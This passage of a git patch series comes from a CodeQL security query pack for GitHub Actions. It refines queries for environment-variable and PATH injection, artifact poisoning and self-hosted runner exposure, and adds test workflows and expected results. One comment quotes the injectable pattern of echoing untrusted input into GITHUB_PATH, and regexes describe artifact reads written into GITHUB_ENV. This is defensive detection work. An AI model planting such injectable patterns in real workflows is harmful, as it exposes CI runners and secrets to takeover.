b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.16 +version: 0.0.17 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dc9c140e60f3..9e8fdef850a6 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.16 +version: 0.0.17 groups: - actions - queries From 6237a8e24cd2bda5c27d4293c4a15f3af2764ed6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 13:27:44 +0200 Subject: [PATCH 217/707] Update action.yml --- action.yml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/action.yml b/action.yml index a9f9b2ad6cb8..4b99389767ce 100644 --- a/action.yml +++ b/action.yml @@ -28,15 +28,15 @@ runs: - name: Process workflow models shell: bash if: inputs.workflow-models + env: + DATA: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - cat > models.yml << 'EOF' - ${{ inputs.workflow-models }} - EOF + echo $DATA > models.yml # Create QLPack cat > qlpack.yml << 'EOF' @@ -55,8 +55,6 @@ runs: - name: Show contents shell: bash run: | - echo "Directory contents" - ls -la echo "Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi echo "QLPack" From 16cf60af008300fea37973242fa894d7668809b9 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:05:40 +0200 Subject: [PATCH 218/707] Add double quotes to env var --- action.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index 4b99389767ce..ca9a54464343 100644 --- a/action.yml +++ b/action.yml @@ -29,14 +29,14 @@ runs: shell: bash if: inputs.workflow-models env: - DATA: ${{ inputs.workflow-models }} + MODELS: ${{ inputs.workflow-models }} run: | # Create QLPack directory mkdir workflow-extpack cd workflow-extpack # Store the extension pack file - echo $DATA > models.yml + echo "$MODELS" > models.yml # Create QLPack cat > qlpack.yml << 'EOF' From 944bd84a58f61450f368bd6d035ce523b54c9629 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 23 Apr 2024 15:15:16 +0200 Subject: [PATCH 219/707] Add missing spaces --- action.yml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/action.yml b/action.yml index ca9a54464343..010e28c6a282 100644 --- a/action.yml +++ b/action.yml @@ -55,10 +55,12 @@ runs: - name: Show contents shell: bash run: | - echo "Models" + echo "##[group] Workflow Models" if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi - echo "QLPack" + echo "##[endgroup]" + echo "##[group] QLPack" if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + echo "##[endgroup]" - name: Scan workflows shell: bash From c9b2dac128f9c885305f79867c7b8a41babc095e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 15:07:05 +0200 Subject: [PATCH 220/707] Update action.yml --- action.yml | 49 ++++++++++++------------------------------------- 1 file changed, 12 insertions(+), 37 deletions(-) diff --git a/action.yml b/action.yml index 010e28c6a282..6a1285de0dee 100644 --- a/action.yml +++ b/action.yml @@ -5,61 +5,36 @@ inputs: token: description: GitHub Token default: ${{ github.token }} - source-root: description: "Path of the root source code directory, relative to $GITHUB_WORKSPACE." default: ${{ github.workspace }} - sarif-output: description: "SARIF File Output" default: "codeql-actions.sarif" - suite: description: "CodeQL Suite to run" default: "actions-code-scanning" - - workflow-models: - description: "Workflow models" + workflow-extpack-path: + description: "Path to Workflow extpack" + required: false + workflow-extpack-name: + description: "Name of the Workflow extpack" required: false runs: using: 'composite' steps: - - name: Process workflow models + - name: extpack contents shell: bash - if: inputs.workflow-models env: - MODELS: ${{ inputs.workflow-models }} - run: | - # Create QLPack directory - mkdir workflow-extpack - cd workflow-extpack - - # Store the extension pack file - echo "$MODELS" > models.yml - - # Create QLPack - cat > qlpack.yml << 'EOF' - name: local/workflow-models - library: true - extensionTargets: - githubsecuritylab/actions-all: '*' - dataExtensions: - - models.yml - EOF - - # Set env vars - echo "EXTPACK_PATH=./workflow-extpack" >> $GITHUB_ENV - echo "EXTPACK_NAME=local/workflow-models" >> $GITHUB_ENV - - - name: Show contents - shell: bash + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" - if [ -f workflow-extpack/models.yml ]; then cat workflow-extpack/models.yml; fi + if [ -f $EXTPACK_PATH/models.yml ]; then cat $EXTPACK_PATH/models.yml; fi echo "##[endgroup]" echo "##[group] QLPack" - if [ -f workflow-extpack/qlpack.yml ]; then cat workflow-extpack/qlpack.yml; fi + if [ -f $EXTPACK_PATH/qlpack.yml ]; then cat $EXTPACK_PATH/qlpack.yml; fi echo "##[endgroup]" - name: Scan workflows @@ -70,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ env.EXTPACK_PATH }} - EXTPACK_NAME: ${{ env.EXTPACK_NAME }} + EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From fbf03fa8e2f7de8eff01d29ef167f7d9f82fcf14 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 21:51:27 +0200 Subject: [PATCH 221/707] New expression is always true tests --- .../CWE-571/.github/workflows/test.yml | 36 +++++++++++++++---- .../CWE-571/ExpressionIsAlwaysTrue.expected | 4 +++ 2 files changed, 33 insertions(+), 7 deletions(-) diff --git a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml index 30c4dcab9320..4ed45ff973e7 100644 --- a/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml +++ b/ql/test/query-tests/Security/CWE-571/.github/workflows/test.yml @@ -1,12 +1,12 @@ -name: Conditionally process PR +name: Event on: - pull_request_target: - types: [opened, synchronize, reopened] + workflow_dispatch: jobs: - process-pr: + if-tests: runs-on: ubuntu-latest + permissions: {} steps: - name: Test 1 if: 1 == 2 @@ -36,10 +36,10 @@ jobs: - name: Test 7 run: echo "Test 7 should not be printed" if: ${{ - github.actor == 'torvalds' || - github.actor == 'dependabot[bot]' + 1 == 2 || + 3 == 4 }} - + - name: Test 8 run: echo "Test 8 should not be printed" if: > @@ -87,3 +87,25 @@ jobs: false || 1 == 2 )}} run: echo "Test 17 should not be printed" + - name: Test 18 + if: ${{ github.event_name }} == 'foo' + run: echo "Test 18 should not be printed" + - name: Test 19 + if: ${{ contains(fromJSON('["OWNER", "MEMBER"]'), github.event.pull_request.author_association )}} || github.actor == 'renovate[bot]' + run: echo "Test 19 should not be printed" + - name: Test 20 + if: ${{ hashFiles('./docker/Dockerfile.debian') }} != "" + run: echo "Test 20 should not be printed" + - name: Test 21 + if: > + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + run: echo "Test 21 should not be printed" + - name: Test 22 + if: | + runner.os == 'Windows' && ( + startsWith(inputs.node, 'v10.') || + startsWith(inputs.node, 'v12.') || + startsWith(inputs.node, 'v14.') + ) + run: echo "Test 22 should not be printed" diff --git a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected index a8f068c9cd8d..d4c16131cc26 100644 --- a/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected +++ b/ql/test/query-tests/Security/CWE-571/ExpressionIsAlwaysTrue.expected @@ -5,3 +5,7 @@ | .github/workflows/test.yml:59:15:59:31 | " ${{ 1 == 2 }}" | Expression always evaluates to true | | .github/workflows/test.yml:79:13:82:14 | \|+ | Expression always evaluates to true | | .github/workflows/test.yml:85:13:88:14 | >+ | Expression always evaluates to true | +| .github/workflows/test.yml:91:13:91:45 | ${{ git ... = 'foo' | Expression always evaluates to true | +| .github/workflows/test.yml:94:13:94:141 | ${{ con ... e[bot]' | Expression always evaluates to true | +| .github/workflows/test.yml:97:13:97:64 | ${{ has ... } != "" | Expression always evaluates to true | +| .github/workflows/test.yml:100:13:102:63 | > | Expression always evaluates to true | From 0ff967b102d640c77324619f24092c6f61e9ddc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:07:18 +0200 Subject: [PATCH 222/707] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 6a1285de0dee..0f7b2ef49ff0 100644 --- a/action.yml +++ b/action.yml @@ -27,7 +27,7 @@ runs: - name: extpack contents shell: bash env: - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | echo "##[group] Workflow Models" From 39308fd89f2ca63366f2ad1e3a9e23d7130f15c4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 24 Apr 2024 22:09:03 +0200 Subject: [PATCH 223/707] Fix typo --- action.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/action.yml b/action.yml index 0f7b2ef49ff0..35c423e103df 100644 --- a/action.yml +++ b/action.yml @@ -45,7 +45,7 @@ runs: INPUT_SOURCE-ROOT: ${{ inputs.source-root }} INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} INPUT_SUITE: ${{ inputs.suite }} - EXTPACK_PATH: ${{ intpus.workflow-extpack-path }} + EXTPACK_PATH: ${{ inputs.workflow-extpack-path }} EXTPACK_NAME: ${{ inputs.workflow-extpack-name }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 27d0a3406dd9fad12f1b2bcdea8634465d7bcac4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 26 Apr 2024 16:17:29 +0200 Subject: [PATCH 224/707] Improve Env path/var injection queries --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/ast/internal/Ast.qll | 19 +- .../actions/controlflow/internal/Cfg.qll | 8 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +- .../dataflow/internal/DataFlowPrivate.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 7 +- .../security/EnvPathInjectionQuery.qll | 58 +- .../actions/security/EnvVarInjectionQuery.qll | 52 +- ql/lib/qlpack.yml | 2 +- .../CodeExecutionOnSelfHostedRunner.ql | 47 ++ ql/src/qlpack.yml | 2 +- ql/test/library-tests/test.actual | 598 ++++++++++++++++++ .../.github/workflows/sonar-source.yml | 75 --- .../CWE-077/.github/workflows/test1.yml | 20 +- .../CWE-077/.github/workflows/test2.yml | 34 +- .../CWE-077/.github/workflows/test3.yml | 47 +- .../CWE-077/.github/workflows/test4.yml | 29 +- .../CWE-077/.github/workflows/test5.yml | 36 ++ .../CWE-077/EnvPathInjection.expected | 20 +- .../Security/CWE-077/EnvVarInjection.expected | 39 +- .../PrivilegedEnvPathInjection.expected | 26 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 + .../PrivilegedEnvVarInjection.expected | 53 +- .../Security/CWE-094/CodeInjection.expected | 6 +- .../CWE-094/PrivilegedCodeInjection.expected | 6 +- .../CWE-200/.github/workflows/test1.yml | 46 +- .../CWE-200/SecretExfiltration.expected | 20 +- .../CWE-284/.github/workflows/test1.yml | 28 + .../CWE-284/.github/workflows/test2.yml | 26 + .../CodeExecutionOnSelfHostedRunner.expected | 4 + .../CodeExecutionOnSelfHostedRunner.qlref | 2 + .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 78 +-- 33 files changed, 1061 insertions(+), 420 deletions(-) create mode 100644 ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql create mode 100644 ql/test/library-tests/test.actual delete mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7c4bf9aa8af0..8e36aef408ec 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -298,6 +298,8 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } } class LocalJob extends Job instanceof LocalJobImpl { @@ -352,6 +354,8 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } class Run extends Step instanceof RunImpl { string getScript() { result = super.getScript() } + ScalarValue getScriptScalar() { result = super.getScriptScalar() } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7cc70c86d20d..0c53dae63717 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -579,10 +579,12 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; + YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and + runson = n.lookup("runs-on").(YamlMappingLikeNode) } override string toString() { result = "Job: " + jobId } @@ -660,6 +662,19 @@ class JobImpl extends AstNodeImpl, TJobNode { // The enclosing workflow is privileged this.getEnclosingWorkflow().isPrivileged() } + + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(string lbl, YamlNode r | + ( + r = runson.getNode(lbl) and + not lbl = ["group", "labels"] + or + r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + ) and + result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ) + } } class LocalJobImpl extends JobImpl { @@ -865,6 +880,8 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue() } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } override string toString() { diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index f3785eada37c..0db8d63e6f3b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -260,7 +260,11 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScriptScalar() + ) and l = child.getLocation() | child @@ -291,3 +295,5 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } + +predicate test(ScalarValueLeaf f) { any() } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4e0496150450..b24f9484a80e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,9 +33,13 @@ class AdditionalTaintStep extends Unit { predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run + ( + Utils::writeToGitHubEnv(run, _, value) or + Utils::writeToGitHubOutput(run, _, value) or + Utils::writeToGitHubPath(run, value) + ) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run.getScriptScalar() ) } @@ -85,12 +89,9 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - ( - Utils::writeToGitHubOutput(run, key, value) or - Utils::writeToGitHubEnv(run, key, value) - ) and + Utils::writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } @@ -99,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and Utils::writeToGitHubEnv(run, key, value) and @@ -110,12 +111,16 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ +predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Run run | + pred.asExpr() = download and + succ.asExpr() = run.getScriptScalar() and + download.getAFollowingStep() = run + ) +} + class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - exists(UntrustedArtifactDownloadStep download, Run run | - node1.asExpr() = download and - node2.asExpr() = run and - download.getAFollowingStep() = run - ) + artifactDownloadToUseStep(node1, node2) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3cbb940131cd..f63af3c10be4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -61,7 +61,8 @@ class DataFlowExpr extends Cfg::Node { this.getAstNode() instanceof Uses or this.getAstNode() instanceof Run or this.getAstNode() instanceof Outputs or - this.getAstNode() instanceof Input + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue } } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 95dc22a40def..8b7eb51276d9 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -299,7 +299,12 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { } class ArtifactPoisoningSink extends DataFlow::Node { - ArtifactPoisoningSink() { this.asExpr() instanceof PoisonableStep } + ArtifactPoisoningSink() { + exists(PoisonableStep step | + step.(Run).getScriptScalar() = this.asExpr() or + step.(UsesStep) = this.asExpr() + ) + } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a5cf2d600f01..25de24032ba2 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -5,23 +5,18 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envPathInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string value | - Utils::writeToGitHubPath(run, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvPathInjectionSink extends DataFlow::Node { } -predicate envPathInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } /** @@ -32,26 +27,23 @@ predicate envPathInjectionFromFileSink(DataFlow::Node sink) { * run: | * echo "$BODY" >> $GITHUB_PATH */ -predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varname, string value | - sink.asExpr().getInScopeEnvVarExpr(varname) = expr and - run = sink.asExpr() and - Utils::writeToGitHubPath(run, value) and - ( - value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] - or - value.matches("$(echo %") and value.indexOf(varname) > 0 +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string value | + this.asExpr().getInScopeEnvVarExpr(varname) = expr and + run.getScriptScalar() = this.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) ) - ) + } } -private class EnvPathInjectionSink extends DataFlow::Node { - EnvPathInjectionSink() { - envPathInjectionFromExprSink(this) or - envPathInjectionFromFileSink(this) or - envPathInjectionFromEnvSink(this) or - externallyDefinedSink(this, "envpath-injection") - } +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0ae333a56f57..cdcc1dbdf818 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -5,33 +5,43 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envVarInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string key, string value | - Utils::writeToGitHubEnv(run, key, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvVarInjectionSink extends DataFlow::Node { } -predicate envVarInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { +// exists(Expression expr, Run run, string varName, string key, string value | +// expr = run.getInScopeEnvVarExpr(varName) and +// Utils::writeToGitHubEnv(run, key, value) and +// expr = sink.asExpr() and +// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") +// ) +// } +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string key, string value | + expr = run.getInScopeEnvVarExpr(varname) and + Utils::writeToGitHubEnv(run, key, value) and + run.getScriptScalar() = this.asExpr() and + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + ) + } } -private class EnvVarInjectionSink extends DataFlow::Node { - EnvVarInjectionSink() { - envVarInjectionFromExprSink(this) or - envVarInjectionFromFileSink(this) or - externallyDefinedSink(this, "envvar-injection") +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) } } +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } +} + /** * A taint-tracking configuration for unsafe user input * that is used to construct and evaluate an environment variable. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f6efd7fa0f1c..1710768761fe 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.17 +version: 0.0.18 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 000000000000..c7bdfbbc323c --- /dev/null +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -0,0 +1,47 @@ +/** + * @name Pull Request code execution on self-hosted runner + * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine + * @kind problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/pr-on-self-hosted-runner + * @tags actions + * security + * external/cwe/cwe-284 + */ + +import actions +import codeql.actions.dataflow.ExternalFlow + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getEnclosingWorkflow().getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + not label + .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.matches("self-hosted:true") + ) +} + +from Job job +where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) +select job, "Job runs on self-hosted runner" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 9e8fdef850a6..24f07dafe898 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.17 +version: 0.0.18 groups: - actions - queries diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual new file mode 100644 index 000000000000..ee68d409634e --- /dev/null +++ b/ql/test/library-tests/test.actual @@ -0,0 +1,598 @@ +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| 